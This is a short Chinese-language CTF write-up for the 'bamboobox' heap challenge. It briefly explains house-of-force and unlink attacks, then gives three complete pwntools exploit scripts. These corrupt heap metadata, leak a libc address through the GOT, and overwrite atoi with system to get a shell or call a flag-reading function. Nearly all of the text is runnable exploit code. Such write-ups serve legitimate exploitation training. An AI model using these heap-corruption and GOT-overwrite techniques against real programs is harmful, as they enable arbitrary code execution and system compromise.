这题主要简单记录下,很久之前做的
有两种做法,一种时house_of_force,另一种时unlink attack
house_of_force就是通过修改top_chunk的size字段为一个很大的值,然后再分配特定大小的chunk,就可以将top_chunk移到我们想要分配内存的地址
利用 unlink 所造成的漏洞时,其实就是对进行 unlink chunk 进行内存布局,然后借助 unlink 操作来达成修改指针的效果。
直接上脚本了
house_of_force:
from pwn import*
context.log_level = 'debug'
p = process('./test')
elf = ELF('./test')
magic = elf.symbols['magic']
def add(length,content):
p.recv()
p.sendline('2')
p.recv()
p.sendline(str(length))
p.recv()
p.sendline(content)
def show():
p.recv()
p.sendline('1')
def change(idx,length,content):
p.recv()
p.sendline('3')
p.recv()
p.sendline(str(idx))
p.recv()
p.sendline(str(length))
p.recv()
p.sendline(content)
def delete(idx):
p.recv()
p.sendline('4')
p.recv()
p.sendline(str(idx))
def exit():
p.recv()
p.sendline('5')
add(0x40,'aaaa')
payload = 'a'*(0x40)+p64(0)+ p64(0xffffffffffffffff)
change(0,len(payload),payload)
#gdb.attach(p)
#pause()
heap_base = -(0x50 + 0x20)
malloc_offset = heap_base -0x10
add(malloc_offset,'bbbb')
pause()
add(0x10,p64(magic)*2)
print p.recv()
p.interactive()
unlink attack: getshell 版
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
p = process('./bamboobox')
elf = ELF('./bamboobox')
ptr = 0x6020c8
magic = 0x400D49
puts = elf.got['puts']
def additem(length,name):
p.recvuntil(":")
p.sendline("2")
p.recvuntil(":")
p.sendline(str(length))
p.recvuntil(":")
p.sendline(name)
def modify(idx,length,name):
p.recvuntil(":")
p.sendline("3")
p.recvuntil(":")
p.sendline(str(idx))
p.recvuntil(":")
p.sendline(str(length))
p.recvuntil(":")
p.sendline(name)
def remove(idx):
p.recvuntil(":")
p.sendline("4")
p.recvuntil(":")
p.sendline(str(idx))
def show():
p.recvuntil(":")
p.sendline("1")
additem(0x80,"a"*8)
additem(0x80,"b"*8)
additem(0x40,"c"*8)
fake_chunk = p64(0) + p64(0x80) + p64(ptr - 0x18) + p64(ptr - 0x10) + 'a'*(0x80 - 32) + p64(0x80) + p64(0x80 + 0x10)
modify(0,0x90,fake_chunk)
remove(1)
payload = p64(0)*2
payload += p64(0x80) + p64(elf.got['atoi'])
modify(0,0x80,payload)
show()
p.recvuntil("0 : ")
atoi = u64(p.recvuntil(":")[:6].ljust(8,"\x00"))
libc_base = atoi - 0x36e80
print "libc:",hex(libc_base)
system = libc_base + 0x45390
modify(0,0x8,p64(system))
p.recvuntil(":")
p.sendline("$0")
p.interactive()
调用magic版 这里我修改了下源文件重新编译了 ,将open文件的路径改成了./flag
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
p = process('./bamboobox')
elf = ELF('./bamboobox')
ptr = 0x6020c8
magic = 0x400D49
puts = elf.got['puts']
context.arch = elf.arch
#context.terminal = ['tmux', 'splitw', '-h']
context.log_level='debug'
def add(length,name):
p.recvuntil(":")
p.sendline("2")
p.recvuntil(":")
p.sendline(str(length))
p.recvuntil(":")
p.sendline(name)
def edit(idx,length,name):
p.recvuntil(":")
p.sendline("3")
p.recvuntil(":")
p.sendline(str(idx))
p.recvuntil("Please enter the length of item name:")
p.sendline(str(length))
p.recvuntil(":")
p.sendline(name)
def delete(idx):
p.recvuntil(":")
p.sendline("4")
p.recvuntil(":")
p.sendline(str(idx))
def show():
p.recvuntil(":")
p.sendline("1")
add(0x80,"a"*8)
add(0x80,"b"*8)
add(0x40,"c"*8)
fake_chunk = p64(0) + p64(0x80) + p64(ptr - 0x18) + p64(ptr - 0x10) + 'a'*(0x80 - 32) + p64(0x80) + p64(0x80 + 0x10)
edit(0,0x90,fake_chunk)
delete(1)
payload = '\x00'*0x10 + p64(0x80) + p64(ptr - 0x18) + p64(0x80) + p64(elf.got['atoi'])
edit(0,0x80,payload)
edit(1,0x10,p64(magic))
p.recv()
p.sendline('5')
p.interactive()